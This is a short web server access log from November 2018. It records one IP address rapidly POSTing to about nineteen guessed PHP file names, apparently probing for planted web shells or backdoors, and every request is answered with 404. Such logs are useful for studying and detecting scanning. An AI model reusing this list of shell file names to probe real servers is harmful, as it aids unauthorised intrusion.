219.159.197.13 - - [02/Nov/2018:09:36:37 +0100] "POST /phpinfi.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:28.0) Gecko/20100101 Firefox/45.0"
219.159.197.13 - - [02/Nov/2018:09:36:37 +0100] "POST /aaaa.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:28.0) Gecko/20100101 Firefox/45.0"
219.159.197.13 - - [02/Nov/2018:09:36:38 +0100] "POST /9510.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:28.0) Gecko/20100101 Firefox/45.0"
219.159.197.13 - - [02/Nov/2018:09:36:38 +0100] "POST /python.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:28.0) Gecko/20100101 Firefox/45.0"
219.159.197.13 - - [02/Nov/2018:09:36:38 +0100] "POST /default.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:28.0) Gecko/20100101 Firefox/45.0"
219.159.197.13 - - [02/Nov/2018:09:36:39 +0100] "POST /sean.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:28.0) Gecko/20100101 Firefox/45.0"
219.159.197.13 - - [02/Nov/2018:09:36:39 +0100] "POST /app.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:28.0) Gecko/20100101 Firefox/45.0"
219.159.197.13 - - [02/Nov/2018:09:36:39 +0100] "POST /help.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:28.0) Gecko/20100101 Firefox/45.0"
219.159.197.13 - - [02/Nov/2018:09:36:39 +0100] "POST /tiandi.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:28.0) Gecko/20100101 Firefox/45.0"
219.159.197.13 - - [02/Nov/2018:09:36:40 +0100] "POST /miao.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:28.0) Gecko/20100101 Firefox/45.0"
219.159.197.13 - - [02/Nov/2018:09:36:40 +0100] "POST /xz.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:28.0) Gecko/20100101 Firefox/45.0"
219.159.197.13 - - [02/Nov/2018:09:36:40 +0100] "POST /linuxse.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:28.0) Gecko/20100101 Firefox/45.0"
219.159.197.13 - - [02/Nov/2018:09:36:40 +0100] "POST /zuoindex.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:28.0) Gecko/20100101 Firefox/45.0"
219.159.197.13 - - [02/Nov/2018:09:36:41 +0100] "POST /zshmindex.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:28.0) Gecko/20100101 Firefox/45.0"
219.159.197.13 - - [02/Nov/2018:09:36:41 +0100] "POST /tomcat.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:28.0) Gecko/20100101 Firefox/45.0"
219.159.197.13 - - [02/Nov/2018:09:36:41 +0100] "POST /ceshi.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:28.0) Gecko/20100101 Firefox/45.0"
219.159.197.13 - - [02/Nov/2018:09:36:41 +0100] "POST /1hou.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:28.0) Gecko/20100101 Firefox/45.0"
219.159.197.13 - - [02/Nov/2018:09:36:42 +0100] "POST /ou2.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:28.0) Gecko/20100101 Firefox/45.0"
219.159.197.13 - - [02/Nov/2018:09:36:42 +0100] "POST /zuos.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:28.0) Gecko/20100101 Firefox/45.0"
